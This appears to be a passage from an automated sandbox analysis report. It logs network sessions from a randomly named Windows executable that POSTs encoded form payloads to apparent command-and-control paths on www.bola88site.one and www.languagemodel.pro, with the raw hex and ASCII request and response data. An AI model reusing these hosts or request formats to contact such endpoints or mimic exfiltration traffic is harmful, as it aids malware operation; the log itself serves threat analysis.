                                                                        Data Ascii: -NnllVvH=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUIMjfko1ltN5+kenbhEZsxTFF9k+0+CVZw==
                                                                        Oct 8, 2024 16:34:53.051943064 CEST1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:34:52 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449979172.96.191.39802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:54.475677967 CEST838OUTPOST /3qit/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Origin: http://www.bola88site.one
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.bola88site.one/3qit/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 33 32 59 36 74 4b 35 39 2f 63 43 7a 34 74 7a 4b 39 38 71 6c 31 6f 69 31 6b 45 72 42 4f 42 34 66 49 3d
                                                                        Data Ascii: -NnllVvH=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+x32Y6tK59/cCz4tzK98ql1oi1kErBOB4fI=
                                                                        Oct 8, 2024 16:34:55.389796972 CEST1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:34:55 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.449990172.96.191.39802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:57.036194086 CEST10920OUTPOST /3qit/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Origin: http://www.bola88site.one
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.bola88site.one/3qit/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 39 39 78 6b 36 4c 50 69 35 44 6c 68 54 43 46 59 46 5a 6e 4f 58 61 4c 51 77 74 77 4c 6f 6b 78 6e 4a 37 6d 47 78 31 79 79 43 58 6d 4b 62 4c 64 57 52 4a 6b 50 74 64 77 7a 62 2f 77 6f 65 78 51 77 61 65 6d 76 79 65 56 73 43 39 37 79 43 30 52 6a 38 35 51 53 6a 78 35 4d 68 4c 50 5a 47 52 73 4f 51 5a 37 64 4b 2b 43 43 53 69 4b 46 79 76 73 76 76 5a 35 58 74 32 62 2f 68 6c 39 4c 61 5a 4c 4a 55 6a 66 44 6f 43 63 57 36 5a 46 6e 39 67 6b 33 69 77 74 48 49 4d 64 59 51 51 6d 4b 45 49 58 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjf99xk6LPi5DlhTCFYFZnOXaLQwtwLokxnJ7mGx1yyCXmKbLdWRJkPtdwzb/woexQwaemvyeVsC97yC0Rj85QSjx5MhLPZGRsOQZ7dK+CCSiKFyvsvvZ5Xt2b/hl9LaZLJUjfDoCcW6ZFn9gk3iwtHIMdYQQmKEIX5dwuOkOto+AVvrlupyo/cfS4p+SI5VJK8y0CDN6KOb53jKpnNQJWYfwwdXGdNMLG1vFo/z8ZPk4MlXOGiuXhSvZlFZ1iHzY93ge7JeLM4wfEfVYEjh2FqbE0jmxFQKLwRfj6EmCCTWVoc3HfUy++cuZm16cP0AfCl0O+Ksy24KJb5QlvxGQhePx15SmeqHw59WilHJHq5tjgsFDSXkiReUz4ZHVlitmV99Ecj8nNkS2EaDBkjgBpxKx2svy+7IYN9dfzhzO36FF8Cvk1JIKeTApD9zHUN+l3J3rT8rpGxXPmDtH1neyCFXS3oA6PIM5Wq7PBqDnelE2iG+2Y08MDcRwhsJ1cTHll2IL4bmvPBH2PSkbOoZasnfemBaDFMo9W1v+tAqNhEtZYadDMNFYazQgaJQ5s4nqTy3wNIQQ8bqnm+cUZeQK3IMOvQUjDpeINDASzIQR/sJQ+rvYeyQxpmUFSmHVDBy3LenwprPHo6wZaXNsf+n2zr3aZLf37Xnryu56sEJPG1c4hQfDf65QJqy3YKgkN7G53cRVoMKEgslsenMXc5nTg3JQaQpvvGsfZXsbZWz9Yq8J/f3HMzn07tYI5hQ6E7AgOduLxgjt2JoaWCr+XvWa7NLZXSaTZse//2Vll1THnuC67u5c7Au0/DElUj0it4509gY [TRUNCATED]
                                                                        Oct 8, 2024 16:34:58.160095930 CEST1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:34:57 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.450009172.96.191.39802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:59.613439083 CEST557OUTGET /3qit/?-NnllVvH=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:00.539025068 CEST1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Tue, 08 Oct 2024 14:35:00 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.450017217.70.184.50802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:05.742425919 CEST827OUTPOST /nxfn/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Origin: http://www.languagemodel.pro
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 45 41 71 74 59 49 54 69 37 5a 44 34 4a 4a 68 56 39 55 72 68 6a 57 4f 2f 68 57 34 63 57 76 56 2f 67 3d 3d
                                                                        Data Ascii: -NnllVvH=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdEAqtYITi7ZD4JJhV9UrhjWO/hW4cWvV/g==
                                                                        Oct 8, 2024 16:35:06.383351088 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.450018217.70.184.50802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:08.803767920 CEST847OUTPOST /nxfn/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Origin: http://www.languagemodel.pro
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 79 39 69 6d 66 4d 52 56 53 63 6b 76 49 30 4f 4d 52 67 4d 39 50 72 73 42 33 44 46 77 79 50 78 77 49 3d
                                                                        Data Ascii: -NnllVvH=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zjy9imfMRVSckvI0OMRgM9PrsB3DFwyPxwI=
                                                                        Oct 8, 2024 16:35:09.392776966 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:09 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.450019217.70.184.50802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:11.502243042 CEST10929OUTPOST /nxfn/ HTTP/1.1
